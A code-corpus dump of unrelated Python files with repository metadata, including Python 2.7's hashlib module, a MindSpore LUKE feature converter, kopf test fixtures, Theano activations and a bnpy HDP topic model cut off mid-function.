df1 = pd.DataFrame({"a": [2, 3], "e": ["a", "c"]})
plot_diff([df1, df2], config={"diff.label": ["train_df", "test_df"]})
def test_dataset() -> None:
df = load_dataset("titanic")
df1 = df[df["Survived"] == 0]
df2 = df[df["Survived"] == 1]
plot_diff([df1, df2])
plot_diff([df1, df2], config={"diff.density": True})
|
a3ae60683bf94a97a238d7a7c2f7af9ebbd6ad55
|
50dd46b8ece33f3cdd174284b15d1d51f89669d4
|
/third_party/edk2/AppPkg/Applications/Python/Python-2.7.2/Lib/hashlib.py
|
a3809485b1e7a62b598cad61eff06f4f22f2759c
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"GPL-1.0-or-later",
"BSD-2-Clause",
"OpenSSL"
] |
permissive
|
google/google-ctf
|
f99da1ee07729bbccb869fff1cbaed6a80e43bcc
|
df02323eaf945d15e124801c74abaadca2749dc7
|
refs/heads/master
| 2023-08-31T14:30:27.548081
| 2023-08-29T13:04:20
| 2023-08-29T13:04:20
| 131,317,137
| 4,136
| 607
|
Apache-2.0
| 2023-08-30T22:17:02
| 2018-04-27T15:56:03
|
Go
|
UTF-8
|
Python
| false
| false
| 5,159
|
py
|
hashlib.py
|
# $Id$
#
# Copyright (C) 2005 Gregory P. Smith (greg@krypto.org)
# Licensed to PSF under a Contributor Agreement.
#
__doc__ = """hashlib module - A common interface to many hash functions.
new(name, string='') - returns a new hash object implementing the
given hash function; initializing the hash
using the given string data.
Named constructor functions are also available, these are much faster
than using new():
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
More algorithms may be available on your platform but the above are
guaranteed to exist.
NOTE: If you want the adler32 or crc32 hash functions they are available in
the zlib module.
Choose your hash function wisely. Some have known collision weaknesses.
sha384 and sha512 will be slow on 32 bit platforms.
Hash objects have these methods:
- update(arg): Update the hash object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- copy(): Return a copy (clone) of the hash object. This can be used to
efficiently compute the digests of strings that share a common
initial substring.
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import hashlib
>>> m = hashlib.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
'\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9'
More condensed:
>>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest()
'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2'
"""
# This tuple and __get_builtin_constructor() must be modified if a new
# always available algorithm is added.
__always_supported = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')
algorithms = __always_supported
__all__ = __always_supported + ('new', 'algorithms')
def __get_builtin_constructor(name):
try:
if name in ('SHA1', 'sha1'):
import _sha
return _sha.new
elif name in ('MD5', 'md5'):
import _md5
return _md5.new
elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'):
import _sha256
bs = name[3:]
if bs == '256':
return _sha256.sha256
elif bs == '224':
return _sha256.sha224
elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'):
import _sha512
bs = name[3:]
if bs == '512':
return _sha512.sha512
elif bs == '384':
return _sha512.sha384
except ImportError:
pass # no extension module, this hash is unsupported.
raise ValueError('unsupported hash type %s' % name)
def __get_openssl_constructor(name):
try:
f = getattr(_hashlib, 'openssl_' + name)
# Allow the C module to raise ValueError. The function will be
# defined but the hash not actually available thanks to OpenSSL.
f()
# Use the C function directly (very fast)
return f
except (AttributeError, ValueError):
return __get_builtin_constructor(name)
def __py_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
return __get_builtin_constructor(name)(string)
def __hash_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
try:
return _hashlib.new(name, string)
except ValueError:
# If the _hashlib module (OpenSSL) doesn't support the named
# hash, try using our builtin implementations.
# This allows for SHA224/256 and SHA384/512 support even though
# the OpenSSL library prior to 0.9.8 doesn't provide them.
return __get_builtin_constructor(name)(string)
try:
import _hashlib
new = __hash_new
__get_hash = __get_openssl_constructor
except ImportError:
new = __py_new
__get_hash = __get_builtin_constructor
for __func_name in __always_supported:
# try them all, some may not work due to the OpenSSL
# version not supporting that algorithm.
try:
globals()[__func_name] = __get_hash(__func_name)
except ValueError:
import logging
logging.exception('code for hash %s was not found.', __func_name)
# Cleanup locals()
del __always_supported, __func_name, __get_hash
del __py_new, __hash_new, __get_openssl_constructor
|
0a84253fe2fe30969a1a333568c25f724fd520ce
|
444a9480bce2035565332d4d4654244c0b5cd47b
|
/research/nlp/luke/src/reading_comprehension/feature.py
|
88fbffc4190f7e49748ab361dc3cc94478886d02
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
mindspore-ai/models
|
7ede9c6454e77e995e674628204e1c6e76bd7b27
|
eab643f51336dbf7d711f02d27e6516e5affee59
|
refs/heads/master
| 2023-07-20T01:49:34.614616
| 2023-07-17T11:43:18
| 2023-07-17T11:43:18
| 417,393,380
| 301
| 92
|
Apache-2.0
| 2023-05-17T11:22:28
| 2021-10-15T06:38:37
|
Python
|
UTF-8
|
Python
| false
| false
| 16,292
|
py
|
feature.py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""feature file"""
import logging
import unicodedata
from argparse import Namespace
from contextlib import closing
from itertools import chain, repeat
import multiprocessing
from multiprocessing.pool import Pool
from tqdm import tqdm
logger = logging.getLogger(__name__)
class InputFeatures:
"""input features"""
def __init__(
self,
unique_id,
example_index,
doc_span_index,
tokens,
mentions,
token_to_orig_map,
token_is_max_context,
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
start_positions,
end_positions,
):
"""init fun"""
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.mentions = mentions
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.word_ids = word_ids
self.word_segment_ids = word_segment_ids
self.word_attention_mask = word_attention_mask
self.entity_ids = entity_ids
self.entity_position_ids = entity_position_ids
self.entity_segment_ids = entity_segment_ids
self.entity_attention_mask = entity_attention_mask
self.start_positions = start_positions
self.end_positions = end_positions
def convert_examples_to_features(
examples,
tokenizer,
entity_vocab,
wiki_link_db,
model_redirect_mappings,
link_redirect_mappings,
max_seq_length,
max_mention_length,
doc_stride,
max_query_length,
min_mention_link_prob,
segment_b_id,
add_extra_sep_token,
is_training,
pool_size=multiprocessing.cpu_count(),
chunk_size=30,
):
"""convert examples to features"""
passage_encoder = PassageEncoder(
tokenizer,
entity_vocab,
wiki_link_db,
model_redirect_mappings,
link_redirect_mappings,
max_mention_length,
min_mention_link_prob,
add_extra_sep_token,
segment_b_id,
)
worker_params = Namespace(
tokenizer=tokenizer,
max_seq_length=max_seq_length,
doc_stride=doc_stride,
max_query_length=max_query_length,
add_extra_sep_token=add_extra_sep_token,
passage_encoder=passage_encoder,
is_training=is_training,
)
features = []
unique_id = 1000000000
with closing(Pool(pool_size, initializer=_initialize_worker, initargs=(worker_params,))) as pool:
with tqdm(total=len(examples)) as pbar:
for ret in pool.imap(_process_example, enumerate(examples), chunksize=chunk_size):
for feature in ret:
feature.unique_id = unique_id
features.append(feature)
unique_id += 1
pbar.update()
return features
class PassageEncoder:
"""passage encoder"""
def __init__(
self,
tokenizer,
entity_vocab,
wiki_link_db,
model_redirect_mappings,
link_redirect_mappings,
max_mention_length,
min_mention_link_prob,
add_extra_sep_token,
segment_b_id,
):
"""passage encoder"""
self._tokenizer = tokenizer
self._entity_vocab = entity_vocab
self._wiki_link_db = wiki_link_db
self._model_redirect_mappings = model_redirect_mappings
self._link_redirect_mappings = link_redirect_mappings
self._max_mention_length = max_mention_length
self._add_extra_sep_token = add_extra_sep_token
self._segment_b_id = segment_b_id
self._min_mention_link_prob = min_mention_link_prob
def encode(self, title, tokens_a, tokens_b):
"""encode"""
if self._add_extra_sep_token:
mid_sep_tokens = [self._tokenizer.sep_token] * 2
else:
mid_sep_tokens = [self._tokenizer.sep_token]
all_tokens = [self._tokenizer.cls_token] + tokens_a + mid_sep_tokens + tokens_b + [self._tokenizer.sep_token]
word_ids = self._tokenizer.convert_tokens_to_ids(all_tokens)
word_segment_ids = [0] * (len(tokens_a) + len(mid_sep_tokens) + 1) + [self._segment_b_id] * (len(tokens_b) + 1)
word_attention_mask = [1] * len(all_tokens)
try:
title = self._link_redirect_mappings.get(title, title)
mention_candidates = {}
ambiguous_mentions = set()
for link in self._wiki_link_db.get(title):
if link.link_prob < self._min_mention_link_prob:
continue
link_text = self._normalize_mention(link.text)
if link_text in mention_candidates and mention_candidates[link_text] != link.title:
ambiguous_mentions.add(link_text)
continue
mention_candidates[link_text] = link.title
for link_text in ambiguous_mentions:
del mention_candidates[link_text]
except KeyError:
mention_candidates = {}
logger.warning("Not found in the Dump DB: %s", title)
mentions_a = self._detect_mentions(tokens_a, mention_candidates)
mentions_b = self._detect_mentions(tokens_b, mention_candidates)
all_mentions = mentions_a + mentions_b
if not all_mentions:
entity_ids = [0, 0]
entity_segment_ids = [0, 0]
entity_attention_mask = [0, 0]
entity_position_ids = [[-1 for y in range(self._max_mention_length)]] * 2
else:
entity_ids = [0] * len(all_mentions)
entity_segment_ids = [0] * len(mentions_a) + [self._segment_b_id] * len(mentions_b)
entity_attention_mask = [1] * len(all_mentions)
entity_position_ids = [[-1 for y in range(self._max_mention_length)] for x in range(len(all_mentions))]
offset_a = 1
offset_b = len(tokens_a) + 2 # 2 for CLS and SEP tokens
if self._add_extra_sep_token:
offset_b += 1
for i, (offset, (entity_id, start, end)) in enumerate(
chain(zip(repeat(offset_a), mentions_a), zip(repeat(offset_b), mentions_b))
):
entity_ids[i] = entity_id
entity_position_ids[i][: end - start] = range(start + offset, end + offset)
if len(all_mentions) == 1:
entity_ids.append(0)
entity_segment_ids.append(0)
entity_attention_mask.append(0)
entity_position_ids.append([-1 for y in range(self._max_mention_length)])
return dict(
tokens=all_tokens,
mentions=all_mentions,
word_ids=word_ids,
word_segment_ids=word_segment_ids,
word_attention_mask=word_attention_mask,
entity_ids=entity_ids,
entity_position_ids=entity_position_ids,
entity_segment_ids=entity_segment_ids,
entity_attention_mask=entity_attention_mask,
)
def _detect_mentions(self, tokens, mention_candidates):
"""detect mentions"""
mentions = []
cur = 0
for start, token in enumerate(tokens):
if start < cur:
continue
if self._is_subword(token):
continue
for end in range(min(start + self._max_mention_length, len(tokens)), start, -1):
if end < len(tokens) and self._is_subword(tokens[end]):
continue
mention_text = self._tokenizer.convert_tokens_to_string(tokens[start:end])
mention_text = self._normalize_mention(mention_text)
if mention_text in mention_candidates:
cur = end
title = mention_candidates[mention_text]
title = self._model_redirect_mappings.get(title, title) # resolve mismatch between two dumps
if title in self._entity_vocab:
mentions.append((self._entity_vocab[title], start, end))
break
return mentions
def _is_subword(self, token):
"""is sub sequence word"""
token = self._tokenizer.convert_tokens_to_string(token)
return True
@staticmethod
def _is_punctuation(char):
"""is punctuation"""
# obtained from:
# https://github.com/huggingface/transformers/blob/5f25a5f367497278bf19c9994569db43f96d5278/transformers/tokenization_bert.py#L489
cp = ord(char)
if 33 <= cp <= 47 or 58 <= cp <= 64 or 91 <= cp <= 96 or 123 <= cp <= 126:
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
@staticmethod
def _normalize_mention(text):
"""normal mention"""
return " ".join(text.lower().split(" ")).strip()
params = None
def _initialize_worker(_params):
"""init worker"""
global params
params = _params
def _add_process_example(doc_spans, query_tokens, tok_to_orig_index, all_doc_tokens, example, tok_start_positions,
tok_end_positions, example_index):
"""add feature"""
features = []
for doc_span_index, doc_span in enumerate(doc_spans):
token_to_orig_map = {}
token_is_max_context = {}
answer_tokens = []
answer_offset = len(query_tokens) + 2
if params.add_extra_sep_token:
answer_offset += 1
for i in range(doc_span["length"]):
split_token_index = doc_span["start"] + i
token_to_orig_map[answer_offset + i] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index)
token_is_max_context[answer_offset + i] = is_max_context
answer_tokens.append(all_doc_tokens[split_token_index])
start_positions = []
end_positions = []
if params.is_training:
if example.is_impossible:
start_positions = [0]
end_positions = [0]
else:
doc_start = doc_span["start"]
doc_end = doc_span["start"] + doc_span["length"] - 1
for tok_start, tok_end in zip(tok_start_positions, tok_end_positions):
if not (tok_start >= doc_start and tok_end <= doc_end):
continue
doc_offset = len(query_tokens) + 2
if params.add_extra_sep_token:
doc_offset += 1
start_positions.append(tok_start - doc_start + doc_offset)
end_positions.append(tok_end - doc_start + doc_offset)
if not start_positions:
start_positions = [0]
end_positions = [0]
features.append(
InputFeatures(unique_id=None, example_index=example_index, doc_span_index=doc_span_index,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context, start_positions=start_positions,
end_positions=end_positions,
**params.passage_encoder.encode(example.title, query_tokens, answer_tokens)
)
)
return features
def _process_example(args):
"""process example"""
example_index, example = args
tokenizer = params.tokenizer
query_tokens = _tokenize(example.question_text)
if len(query_tokens) > params.max_query_length:
query_tokens = query_tokens[0: params.max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for i, token in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = _tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_positions = []
tok_end_positions = []
if params.is_training and not example.is_impossible:
for start, end, answer_text in zip(example.start_positions, example.end_positions, example.answer_texts):
tok_start = orig_to_tok_index[start]
if end < len(example.doc_tokens) - 1:
tok_end = orig_to_tok_index[end + 1] - 1
else:
tok_end = len(all_doc_tokens) - 1
tok_start, tok_end = _improve_answer_span(all_doc_tokens, tok_start, tok_end, tokenizer, answer_text)
tok_start_positions.append(tok_start)
tok_end_positions.append(tok_end)
max_tokens_for_doc = params.max_seq_length - len(query_tokens) - 3
if params.add_extra_sep_token:
max_tokens_for_doc -= 1
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(dict(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, params.doc_stride)
return _add_process_example(doc_spans, query_tokens, tok_to_orig_index, all_doc_tokens, example,
tok_start_positions, tok_end_positions, example_index)
def _tokenize(text):
"""token"""
return params.tokenizer.tokenize(text, add_prefix_space=True)
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer.
Original version was obtained from here:
https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L25
"""
tok_answer_text = tokenizer.convert_tokens_to_string(_tokenize(orig_answer_text)).strip()
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = tokenizer.convert_tokens_to_string(doc_tokens[new_start: (new_end + 1)]).strip()
if text_span == tok_answer_text:
return new_start, new_end
return input_start, input_end
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token.
Original version was obtained from here:
https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L38
"""
best_score = None
best_span_index = None
for span_index, doc_span in enumerate(doc_spans):
end = doc_span["start"] + doc_span["length"] - 1
if position < doc_span["start"]:
continue
if position > end:
continue
num_left_context = position - doc_span["start"]
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span["length"]
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
|
5db6cbd6e654b294f634fbd9c7bff104c052a2b9
|
36437b397a855f3986325f1bfe41d7ced00b703a
|
/tests/handling/daemons/conftest.py
|
623d0d43c1a5bff69359d6da403a8737a8f6f56b
|
[
"MIT"
] |
permissive
|
nolar/kopf
|
090cd21550e3a86e512a4c9150dfcf5f59ac14e4
|
538df59b88d1aab7b985d703483497f73c6c4783
|
refs/heads/main
| 2023-08-29T20:39:07.128912
| 2023-08-24T15:47:40
| 2023-08-24T15:47:40
| 288,234,242
| 1,627
| 154
|
MIT
| 2023-09-14T12:31:33
| 2020-08-17T16:45:35
|
Python
|
UTF-8
|
Python
| false
| false
| 3,893
|
py
|
conftest.py
|
import asyncio
import contextlib
import time
import freezegun
import pytest
from mock import MagicMock, patch
import kopf
from kopf._cogs.aiokits.aiotoggles import ToggleSet
from kopf._cogs.structs.bodies import RawBody
from kopf._cogs.structs.ephemera import Memo
from kopf._core.engines.daemons import daemon_killer
from kopf._core.engines.indexing import OperatorIndexers
from kopf._core.reactor.processing import process_resource_event
class DaemonDummy:
def __init__(self):
super().__init__()
self.mock = MagicMock()
self.kwargs = {}
self.steps = {
'called': asyncio.Event(),
'finish': asyncio.Event(),
'error': asyncio.Event(),
}
async def wait_for_daemon_done(self):
stopped = self.kwargs['stopped']
await stopped.wait()
while not stopped.reason & stopped.reason.DONE:
await asyncio.sleep(0) # give control back to asyncio event loop
@pytest.fixture()
def dummy():
return DaemonDummy()
@pytest.fixture()
def simulate_cycle(k8s_mocked, registry, settings, resource, memories, mocker):
"""
Simulate K8s behaviour locally in memory (some meaningful approximation).
"""
def _merge_dicts(src, dst):
for key, val in src.items():
if isinstance(val, dict) and key in dst:
_merge_dicts(src[key], dst[key])
else:
dst[key] = val
async def _simulate_cycle(event_object: RawBody):
mocker.resetall()
await process_resource_event(
lifecycle=kopf.lifecycles.all_at_once,
registry=registry,
settings=settings,
resource=resource,
memories=memories,
memobase=Memo(),
indexers=OperatorIndexers(),
raw_event={'type': 'irrelevant', 'object': event_object},
event_queue=asyncio.Queue(),
)
# Do the same as k8s does: merge the patches into the object.
for call in k8s_mocked.patch.call_args_list:
_merge_dicts(call[1]['payload'], event_object)
return _simulate_cycle
@pytest.fixture()
async def operator_paused():
return ToggleSet(any)
@pytest.fixture()
async def conflicts_found(operator_paused: ToggleSet):
return await operator_paused.make_toggle(name="conflicts_found fixture")
@pytest.fixture()
async def background_daemon_killer(settings, memories, operator_paused):
"""
Run the daemon killer in the background.
"""
task = asyncio.create_task(daemon_killer(
settings=settings, memories=memories, operator_paused=operator_paused))
yield task
with contextlib.suppress(asyncio.CancelledError):
task.cancel()
await task
@pytest.fixture()
def frozen_time():
"""
A helper to simulate time movements to step over long sleeps/timeouts.
"""
# TODO LATER: Either freezegun should support the system clock, or find something else.
with freezegun.freeze_time("2020-01-01 00:00:00") as frozen:
# Use freezegun-supported time instead of system clocks -- for testing purposes only.
# NB: Patch strictly after the time is frozen -- to use fake_time(), not real time().
with patch('time.monotonic', time.time), patch('time.perf_counter', time.time):
yield frozen
# The time-driven tests mock the sleeps, and shift the time as much as it was requested to sleep.
# This makes the sleep realistic for the app code, though executed instantly for the tests.
@pytest.fixture()
def manual_time(k8s_mocked, frozen_time):
async def sleep_substitute(delay, *_, **__):
if delay is None:
pass
elif isinstance(delay, float):
frozen_time.tick(delay)
else:
frozen_time.tick(min(delay))
k8s_mocked.sleep.side_effect = sleep_substitute
yield frozen_time
|
e15418b7e1c1ee7b6b1347098c3b06e2dc69f66d
|
85cae8f37f1e9ff7c1bf294002e841ea674834f0
|
/app/ui/colours.py
|
2ea8674bc4abf1cd60f7421910295e03138c4b7c
|
[
"MIT"
] |
permissive
|
tobykurien/rpi_lcars
|
1e4bc7bfb3dadacabee71fe4b5446152ca1acacb
|
656dbff619ebb09a426ee264f024e6b3fc2cf487
|
refs/heads/master
| 2023-07-10T05:57:34.118772
| 2021-07-13T15:52:07
| 2021-07-13T15:52:07
| 50,026,729
| 675
| 187
|
MIT
| 2021-10-19T06:40:22
| 2016-01-20T11:48:50
|
Python
|
UTF-8
|
Python
| false
| false
| 243
|
py
|
colours.py
|
# LCARS colour scheme
BLACK = 0, 0, 0
WHITE = 255, 255, 255
ORANGE = 255, 153, 0
PURPLE = 204, 153, 204
GREY_BLUE = 153, 153, 204
RED_BROWN = 204, 102, 102
BEIGE = 255, 204, 153
BLUE = 153, 153, 255
PEACH = 255, 153, 102
PINK = 204, 102, 153
|
f4e6d8040e3993153f7f46aa45db0bc7636a90bb
|
69f9287a28472cf64af423bfd6f6bb4b097727b8
|
/emolga/basic/activations.py
|
ec64ccaffae79c5363cf910abc09473d57f17376
|
[
"MIT"
] |
permissive
|
memray/seq2seq-keyphrase
|
3e0911a12c2cee5aa6c5283886b2317446f72052
|
e8660727a4f109c05ce52427d2ff756d19fc0f25
|
refs/heads/master
| 2023-02-09T14:25:08.971419
| 2023-01-31T03:23:21
| 2023-01-31T03:23:21
| 77,419,203
| 351
| 120
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
activations.py
|
import theano.tensor as T
def softmax(x):
return T.nnet.softmax(x.reshape((-1, x.shape[-1]))).reshape(x.shape)
def vector_softmax(x):
return T.nnet.softmax(x.reshape((1, x.shape[0])))[0]
def time_distributed_softmax(x):
import warnings
warnings.warn("time_distributed_softmax is deprecated. Just use softmax!", DeprecationWarning)
return softmax(x)
def softplus(x):
return T.nnet.softplus(x)
def relu(x):
return T.nnet.relu(x)
def tanh(x):
return T.tanh(x)
def sigmoid(x):
return T.nnet.sigmoid(x)
def hard_sigmoid(x):
return T.nnet.hard_sigmoid(x)
def linear(x):
'''
The function returns the variable that is passed in, so all types work
'''
return x
def maxout2(x):
shape = x.shape
if x.ndim == 1:
shape1 = T.cast(shape[0] / 2, 'int32')
shape2 = T.cast(2, 'int32')
x = x.reshape([shape1, shape2])
x = x.max(1)
elif x.ndim == 2:
shape1 = T.cast(shape[1] / 2, 'int32')
shape2 = T.cast(2, 'int32')
x = x.reshape([shape[0], shape1, shape2])
x = x.max(2)
elif x.ndim == 3:
shape1 = T.cast(shape[2] / 2, 'int32')
shape2 = T.cast(2, 'int32')
x = x.reshape([shape[0], shape[1], shape1, shape2])
x = x.max(3)
return x
from emolga.utils.generic_utils import get_from_module
def get(identifier):
return get_from_module(identifier, globals(), 'activation function')
|
fc8eb0559f3f71c99d9c4473ab83142a86c30781
|
eda6e7b8f399dedcdb960f4b48a2134b978f8d83
|
/tests/zzz_deprecated_unmaintained/allocmodel/topics/HDP-point-estimation/HDPSB.py
|
6856c663c06ba31744011c43759a232555727aeb
|
[
"BSD-3-Clause"
] |
permissive
|
bnpy/bnpy
|
8ed61bc4fe2f0ed99e0254c11a21c27c0cee59b2
|
ffc2242427451aa6a61dcac1473c47577a5ade6f
|
refs/heads/master
| 2023-08-16T06:49:58.716279
| 2022-10-15T15:59:12
| 2022-10-15T15:59:12
| 75,731,181
| 197
| 54
|
NOASSERTION
| 2023-07-21T20:59:10
| 2016-12-06T12:56:07
|
Python
|
UTF-8
|
Python
| false
| false
| 15,988
|
py
|
HDPSB.py
|
'''
HDPSB.py
Bayesian nonparametric admixture model via the Hierarchical Dirichlet Process.
Uses a direct construction that maintains K active components.
Attributes
-------
K : # of components
gamma : scalar positive real, global concentration
alpha : scalar positive real, document-level concentration param
Local Model Parameters (document-specific)
--------
z : one-of-K topic assignment indicator for tokens
z_{dn} : binary indicator vector for assignment of token n in document d
z_{dnk} = 1 iff assigned to topic k, 0 otherwise.
v : document-specific stick-breaking lengths for each active topic
v1 : 2D array, size D x K
v0 : 2D array, size D x K
Local Variational Parameters
--------
resp : q(z_dn) = Categorical( z_dn | resp_{dn1}, ... resp_{dnK} )
eta1, eta0 : q(v_d) = Beta( eta1[d,k], eta0[d,k])
Global Model Parameters (shared across all documents)
--------
rho : 1D array, size K
omega : 1D array, size K
q(u_k) = Beta(rho[k]*omega[k], (1-rho[k])*omega[k])
References
-------
TODO
Latent Dirichlet Allocation, by Blei, Ng, and Jordan
introduces a classic admixture model with Dirichlet-Mult observations.
'''
import numpy as np
from bnpy.allocmodel.AllocModel import AllocModel
from bnpy.suffstats import SuffStatBag
from bnpy.util import digamma, gammaln
from bnpy.util import NumericUtil, as1D
import OptimizerHDPSB as OptimHDPSB
import LocalUtil
class HDPSB(AllocModel):
def __init__(self, inferType, priorDict=None):
if inferType == 'EM':
raise ValueError('HDPSB cannot do EM.')
self.inferType = inferType
self.K = 0
if priorDict is None:
self.set_prior()
else:
self.set_prior(**priorDict)
def get_keys_for_memoized_local_params(self):
''' Return list of string names of the LP fields
that moVB needs to memoize across visits to a particular batch
'''
return ['DocTopicCount']
def get_active_comp_probs(self):
''' Return K vector of appearance probabilities for each of the K comps
'''
return self.E_beta_active()
def E_beta_active(self):
''' Return vector beta of appearance probabilities for active components
'''
if not hasattr(self, 'Ebeta'):
self.Ebeta = self.rho.copy()
self.Ebeta[1:] *= np.cumprod(1 - self.rho[:-1])
return self.Ebeta
def E_beta_and_betagt(self):
''' Return vectors beta, beta_gt that define conditional appearance probs
Returns
--------
beta : 1D array, size K
beta_gt : 1D array, size K
'''
if not 'Ebeta_gt' in self.__dict__:
self.Ebeta = self.E_beta_active()
self.Ebeta_gt = gtsum(self.Ebeta) + (1-np.sum(self.Ebeta))
return self.Ebeta, self.Ebeta_gt
def ClearCache(self):
if hasattr(self, 'Ebeta'):
del self.Ebeta
if hasattr(self, 'Ebeta_gt'):
del self.Ebeta_gt
def set_prior(self, gamma=1.0, alpha=1.0, **kwargs):
self.alpha = float(alpha)
self.gamma = float(gamma)
def to_dict(self):
return dict(rho=self.rho, omega=self.omega)
def from_dict(self, Dict):
self.inferType = Dict['inferType']
self.K = Dict['K']
self.rho = as1D(Dict['rho'])
self.omega = as1D(Dict['omega'])
def get_prior_dict(self):
return dict(alpha=self.alpha, gamma=self.gamma,
K=self.K,
inferType=self.inferType)
def get_info_string(self):
''' Returns human-readable name of this object
'''
return 'HDP model with K=%d active comps. gamma=%.2f. alpha=%.2f' \
% (self.K, self.gamma, self.alpha)
####################################################### VB Local Step
####################################################### (E-step)
def calc_local_params(self, Data, LP, **kwargs):
''' Calculate document-specific quantities (E-step)
Returns
-------
LP : local params dict, with fields
* resp
* theta
* ElogPi
* DocTopicCount
'''
LP = LocalUtil.calcLocalParams(Data, LP, self, **kwargs)
assert 'resp' in LP
assert 'DocTopicCount' in LP
return LP
def calcLogPrActiveCompsForDoc(self, DocTopicCount_d, out):
''' Calculate log prob of each of the K active topics given doc-topic counts
Returns
-------
logp : 1D array, size K
logp[k] gives probability of topic k in provided doc
'''
Ebeta, Ebeta_gt = self.E_beta_and_betagt()
eta1 = DocTopicCount_d + self.alpha * Ebeta
eta0 = gtsum(DocTopicCount_d) + self.alpha * Ebeta_gt
digammaBoth = digamma(eta1+eta0)
ElogVd = digamma(eta1) - digammaBoth
Elog1mVd = digamma(eta0) - digammaBoth
out[:] = ElogVd
out[1:] += np.cumsum(Elog1mVd[:-1])
return out
def calcLogPrActiveComps_Fast(self, DocTopicCount, activeDocs=None, LP=dict(),
out=None):
''' Calculate log prob of each active topic for each active document
'''
Ebeta, Ebeta_gt = self.E_beta_and_betagt()
if activeDocs is None:
activeDocTopicCount = DocTopicCount
else:
activeDocTopicCount = np.take(DocTopicCount, activeDocs, axis=0)
if 'eta1' in LP:
LP['eta1'][activeDocs] = activeDocTopicCount + self.alpha * Ebeta
else:
LP['eta1'] = DocTopicCount + self.alpha * Ebeta
if 'eta0' in LP:
LP['eta0'][activeDocs] = gtsum(activeDocTopicCount) \
+ self.alpha * Ebeta_gt
else:
LP['eta0'] = gtsum(DocTopicCount) + self.alpha * Ebeta_gt
eta1 = LP['eta1']
eta0 = LP['eta0']
digammaBoth = digamma(eta1+eta0)
ElogVd = digamma(eta1) - digammaBoth
Elog1mVd = digamma(eta0) - digammaBoth
if out is None:
ElogPi = ElogVd.copy()
else:
ElogPi = out
ElogPi[activeDocs] = ElogVd[activeDocs]
if activeDocs is None:
ElogPi[:,1:] += np.cumsum(Elog1mVd[:,:-1], axis=1)
else:
ElogPi[activeDocs,1:] += np.cumsum(Elog1mVd[activeDocs,:-1], axis=1)
return ElogPi
def updateLPGivenDocTopicCount(self, LP, DocTopicCount):
''' Update all local parameters, given topic counts for all docs in set.
Returns
--------
LP : dict of local params, with updated fields
* eta1, eta0
* ElogVd, Elog1mVd
* ElogPi
'''
DocTopicCount_gt = gtsum(DocTopicCount)
Ebeta, Ebeta_gt = self.E_beta_and_betagt()
eta1 = DocTopicCount + self.alpha * Ebeta
eta0 = DocTopicCount_gt + self.alpha * Ebeta_gt
## Double-check!
Ebeta2, Ebeta_gt2 = self.E_beta_and_betagt()
assert np.allclose(Ebeta2, Ebeta)
assert np.allclose(Ebeta_gt2, Ebeta_gt)
digammaBoth = digamma(eta1+eta0)
ElogV = digamma(eta1) - digammaBoth
Elog1mV = digamma(eta0) - digammaBoth
ElogPi = ElogV.copy()
ElogPi[:, 1:] += np.cumsum(Elog1mV[:, :-1], axis=1)
LP['DocTopicCount_gt'] = DocTopicCount_gt
LP['eta1'] = eta1
